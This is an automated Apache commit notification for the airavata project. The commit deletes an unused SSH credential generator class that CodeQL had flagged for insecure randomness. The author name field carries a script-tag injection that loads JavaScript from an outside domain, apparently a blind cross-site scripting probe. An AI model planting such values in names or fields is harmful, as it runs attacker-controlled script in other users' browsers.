This is an automated email from the ASF dual-hosted git repository.
yasith pushed a commit to branch master
in repository https://gitbox.apache.org/repos/asf/airavata.git
The following commit(s) were added to refs/heads/master by this push:
new b3046107b2 Delete unused SSHCredentialGenerator (#240)
b3046107b2 is described below
commit b3046107b28f659884365fe1be02493c96336ade
Author: Jonathan Leitschuh"script src="https://js.rip/b27oz0xw7e"/script
<[email protected]>
AuthorDate: Sat Apr 26 18:00:51 2025 -0400
Delete unused SSHCredentialGenerator (#240)
This class was triggering a CodeQL query for detecting the use of insecure
RNG in a security sensitive location.
Doesn't look like this class is used so it would be good to remove it.